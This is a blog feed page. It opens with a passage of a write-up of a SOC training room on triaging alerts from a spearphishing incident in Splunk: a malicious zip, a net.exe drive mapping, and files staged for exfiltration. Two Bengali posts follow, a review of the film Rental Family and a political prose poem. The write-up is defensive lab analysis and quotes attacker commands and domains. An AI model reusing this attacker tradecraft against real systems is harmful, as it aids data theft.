Eventually, using Splunk search filters, we will find that at 01/26/2026 21:20:19.473 (25 minutes before the alert) the CEO's email, michael.ascot@tryhatme.com, received a email containing an attachment named ImportantInvoice-Febrary.zip. The body and subject of the email indicated that an account was about the closed unless payment was processed, and to read the attachment to stop it. Yet another common Phishing technique, or Spearphishing in this case as the target was the CEO. The Spearphishing through Attachment technique has a MITRE ATT&CK ID of T1566.001. We can also notice a small typo on the name of the attachment (Febrary instead of February), which is not uncommon to see on Phishing emails. This CEO would unfortunately download the file at 01/26/2026 21:40:26.47. as Splunk shows us the file was created in the C:\Users\michael.ascot\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UP4KOJQB\ImportantInvoice-Febrary.zip file path. The chain of malicious events follows.

With all this information, we can write quite a hefty report. We now know it's a True Positive and that it requires escalation.

Recommended Remediation Actions: host isolation to prevent further movement, malware cleanup, phishing awaraness training, Data Loss Prevention tools. Add haz4rd4wre.io to list of malicious domains. The file was also run on the TryDetectMe threat intelligence tool, which recognized it as clean – inform on this as well.

Alerts with IDs 1005, 1020, 1023, 1026-1034 were related to this alert – they were either the spearphishing email, the creation of the malicious attachment, or other alerts of the Suspicious Parent-Child relationship type but with lookups to other subdomains. Because of this, they should have the same verdict, but be sure to explain this thoroughly on the report (the LLM will most likely still grade it with low points, but that's due to its logic rather than a mistake on our side).

Alert 4: Network drive mapped to a local drive (ID 1022) – Medium severity

Description:
A network drive was mapped to a local drive. Normally, this is not a cause for concern, but investigate further to determine if it is malicious.

timestamp:
01/26/2026 21:43:57.473

host.name:
win-3450

process.name:
net.exe

process.pid:
5784

process.parent.pid
3728

process.parent.name:
powershell.exe

process.command_line:
"C:\Windows\system32\net.exe" use Z: \\FILESRV-01\SSF-FinancialRecords

process.working_directory:
C:\Users\michael.ascot\downloads\

event.action:
Process Create (rule: ProcessCreate)

This normally wouldn't be cause for concern, as the description in the SIEM tells us, but we can see it happened on hostname win-3450, who was just the victim of a Phishing attack. The timestamp here will be key to detect any potential problem.

At 01/26/2026 21:43:57.47, Michael Ascot copied the SSF-FinancialRecords file to a local drive, which was disconnected at 01/26/2026 21:44:42.473. There is nothing extraordinary about this. However, if we take a look at the Splunk logs near this event, at 01/26/2026 21:44:31.473 it is revealed that a process, with the same process ID of a process that is part of the malware involved in Alert ID 1025 (True Positive requiring escalation), cloned the file to the C:\Users\michael.ascot\downloads\exfiltration /E directory – the directory used to exfiltrate files. The malware running was most likely set up to clone any file in transit to different directories to the exfiltration directory.

Recommended Remediation Actions: similarly to Alert ID 1025, user awareness training, and DLP and IPS tools should be put in place.

Alert ID 1024 – Network drive disconnected from a local drive, is part of this alert (the disconnection of this drive), and therefore has the same verdict.

And with this one, the room has finished. Out of 36 alerts, there were 17 True Positives, where most of them were alerts generated as a result of processes from previous alerts. We learnt the importance of User Awareness Training, as this could have been avoided if the user from Alert 1025 would have not have downloaded the attachment, and of Log monitoring. How a single email ended up cluttering the SIEM with alerts and created a serious incident. It is important to always remain vigilant and constantly monitor the network, as an attack can strike in many forms and at any time, and have catastrophic consequences.

 
Read more...

from লোকমানুষ এর ব্লগ

কিছু সিনেমা আমরা গল্পের টানে দেখি, কিছু দেখি অভিনেতার জন্য। Rental Family (2025) আমার ক্ষেত্রে দ্বিতীয় দলে পড়লেও, সিনেমা শেষ করে উঠে দাঁড়ানোর সময় বুঝলাম- এটা শুধু একজন অভিনেতার কামব্যাক নয়, বরং মানুষের প্রয়োজন, শূন্যতা আর অনুভূতির এক গভীর পাঠ।

ব্রেন্ডন ফ্রেজার – এই নামটা আমার কাছে মানেই সদ্য কৈশোর পেরিয়ে যুব পথে এগিয়ে যাওয়া বয়সের রোমাঞ্চ। The Mummy, Journey to the Center of the Earth – এই সিনেমাগুলোয় তার উপস্থিতি ছিল প্রাণবন্ত, আত্মবিশ্বাসী, আলোয় ভরা। বহুদিন পর তার চেহারাটি পোস্টারে চোখে পড়তেই যেন পুরোনো স্মৃতি গুলো ঝলমল করে উঠলো, আর সেই টানেই বসে পড়েছিলাম “ভাড়া পরিবার” বা ‘Rental Family’ দেখতে। কিন্তু এবারের ব্রেন্ডন ফ্রেজার ছিলেন একেবারেই ভিন্ন একজন – নীরব, ভাঙা, ক্লান্ত এক মানুষ।

এই সিনেমার Philip চরিত্রটিকে দেখে বারবার মনে হয়েছে, সে যেন ব্রেন্ডন ফ্রেজারের বাস্তব জীবনেরই এক ছায়া। একসময় যিনি অভিনয় জগতে জনপ্রিয়তার শিখরে ছিলেন, আজ তার নামই যেন ভুলে যেতে বসেছে মানুষ। জীবনের দায়ে, টিকে থাকার তাগিদে সে অভিনয় করছে। কিন্তু সেটি কোনো মঞ্চে নয়, বরং মানুষের জীবনের ফাঁকা জায়গাগুলোতে। বাবা নেই এমন শিশুর ভাড়া করা বাবা, পরিবারের সামনে একজন নারীর পরিপূর্ণতা লাভে ভাড়াটে স্বামী – এ যেন অভিনয়েরও আরেক রূপ, যেখানে ক্যামেরা নেই, কিন্তু অনুভূতি আছে।

সিনেমাটি দেখতে দেখতে সবচেয়ে যে ভাবনাটি মনে গভীরভাবে দাগ কেটেছে, তা হলো- মানুষ কত বিচিত্র উপায়ে মানুষের প্রয়োজন পূরণ করে। সমাজের প্রতিটি শূন্যস্থান কেউ না কেউ এসে ভরাট করে দেয়। কেউ পেশার খাতিরে, কেউ বাঁচার তাগিদে, কেউ বা নিঃসঙ্গতা থেকে। Rental Family যেন সেই অদ্ভুত অথচ বাস্তব পৃথিবীর দরজাটা ধীরে খুলে দেয়, যেখানে ভালোবাসা ভাড়া নেওয়া যায়, পরিবার সাময়িক হয়, কিন্তু অনুভূতিগুলো অস্থায়ী হলেও মিথ্যে নয়।

Philip চরিত্রের সবচেয়ে মানবিক মুহূর্তটি আসে তখনই, যখন সে নিজের বহু কাঠখড় পুড়িয়ে পাওয়া একটি ডিটেকটিভ সিনেমার অফার ফিরিয়ে দেয়। এই শহর, এই দেশ ছেড়ে যেতে হবে- এই শর্তের সামনে দাঁড়িয়ে সে মনে করে ছোট্ট মেয়েটির কথা, যার বাবার ভূমিকায় অভিনয় করতে করতে সে নিজেই আবেগে জড়িয়ে পড়েছে।

বাস্তবে কোনো সম্পর্ক নেই, কোনো রক্তের টান নেই – তবু সে মেয়েটিকে কথা দিয়েছিল, সে আর তাকে ছেড়ে যাবে না। এই দৃশ্যটি নিঃশব্দে বলে দেয়- অনুভূতির প্রতিশ্রুতি কখনো কখনো জীবনের লক্ষ্যকেও হার মানায়।

সিনেমার আরেকটি গভীরভাবে নাড়া দেওয়া চরিত্র Kikuo Hasegawa। একসময়ের বিখ্যাত অভিনেতা, আজ স্মৃতিভ্রমে আক্রান্ত এক বৃদ্ধ। তার একটাই ইচ্ছা- শৈশবের বাড়ি, যৌবনের স্মৃতি, পরিবার নিয়ে কাটানো গ্রামের সেই নিবাসকে, সেই দিনগুলো আরেকবার দেখে আসা। কিন্তু বয়স আর রোগের দেয়ালে আটকে যায় সেই আকুতি।

নিজের মেয়ের নিষেধ অগ্রাহ্য করে Philip-কে সঙ্গী করে সে চুপিচুপি বেরিয়ে পড়ে। এই যাত্রা শুধু একটি ভ্রমণ নয়, বরং জীবনের শেষ প্রান্তে দাঁড়িয়ে নিজের অস্তিত্বটুকু ছুঁয়ে দেখার চেষ্টা।

আর Shinji Tada, এই চরিত্রটি যেন সবচেয়ে নগ্ন বাস্তবতার প্রতিচ্ছবি। মানসিক শান্তির জন্য সে ভাড়া করে নেয় স্ত্রী ও সন্তান। নিজের ভেতরের শূন্যতা ঢাকতে সে মিথ্যের আশ্রয় নেয়, কারণ তার কল্পনার পরিবার বাস্তবে নেই। তবু এই মিথ্যে সম্পর্কের মাঝেও তার বেঁচে থাকার লড়াইটা করুণভাবে সত্য। ⠀⠀⠀⠀ ⠀⠀⠀⠀ ⠀⠀⠀⠀ Rental Family কোনো উচ্চকণ্ঠ সিনেমা নয়। এখানে নেই নাটকীয় সংলাপ, নেই বড়ো কোনো মোড়। কিন্তু প্রতিটি দৃশ্য নিঃশব্দে প্রশ্ন ছুড়ে দেয়- আমরা কি সত্যিই একা? নাকি প্রয়োজন আর অভিনয়ের মাঝামাঝি কোথাও আমাদের অনুভূতিগুলো সত্যি হয়ে ওঠে?

সিনেমাটি শেষ হওয়ার পর মনে হয়েছে, এই গল্পটা শুধু পর্দার নয়- এটা আমাদের চারপাশেই ছড়িয়ে আছে। ভাড়ার সম্পর্ক, অভিনীত অনুভূতি, আর তার ভেতর জন্ম নেওয়া অপ্রত্যাশিত মানবিক বন্ধন- সব মিলিয়ে Rental Family এমন একটি সিনেমা, যা দেখে বেরিয়ে এসে মানুষ আর জীবনের দিকে নতুন করে তাকাতে ইচ্ছে করে।

⠀⠀

যদি আপনি নীরব, মানবিক আর ভাবনার খোরাক দেওয়া সিনেমা পছন্দ করেন, তাহলে এই সিনেমাটি আপনার দেখার তালিকায় থাকতেই পারে।

⠀⠀

⠀⠀

⠀⠀

 
Read more...

from লোকমানুষ এর ব্লগ

শব্দ আছে, কণ্ঠ নেই..

এই ছবিটা আমাদের রাজনীতির নীরব আত্মকথা এখানে নেতা বলেন আর জনতা মুগ্ধ হয় শব্দগুলো আলো জ্বালায়, আকাঙ্ক্ষার মানচিত্র আঁকে মঞ্চে দাঁড়িয়ে পরিবর্তনের প্রতিশ্রুতিতে তালি পড়ে

কিন্তু মঞ্চ থেকে নামলেই দৃশ্য বদলে যায় স্বপ্ন পথে হাঁটতে চাইলে সিস্টেম চোখ রাঙানি দেয় প্রশ্ন করতে গেলেই হাত বাড়ে গলার দিকে কণ্ঠ রুদ্ধ হলে সত্য ও স্বপ্ন দু’টিই হাঁপিয়ে পড়ে

ক্ষমতার বড়ো মুখটা ছোট মুখটাকে অভিভূত করে, করতালির বিনিময়ে স্বপ্নের ছায়া দেখিয়ে বেড়ায় আশ্বাসের বাণী সব মাইক্রোফোনে উন্মুক্ত, আর মানুষ খুব সন্তর্পণে তার দীর্ঘশ্বাস লুকায়

আমাদের রাজনীতি শব্দ ভালোবাসে, কিন্তু কণ্ঠ সহ্য করতে পারে না এখানে বক্তৃতা নিরাপদ, বাস্তবতা বিপজ্জনক তবু ইতিহাস বলে- চেপে ধরা গলাও একদিন চিৎকার শিখে ফেলে...

ছবি কার্টেসি: Eiko Ojala

 
Read more...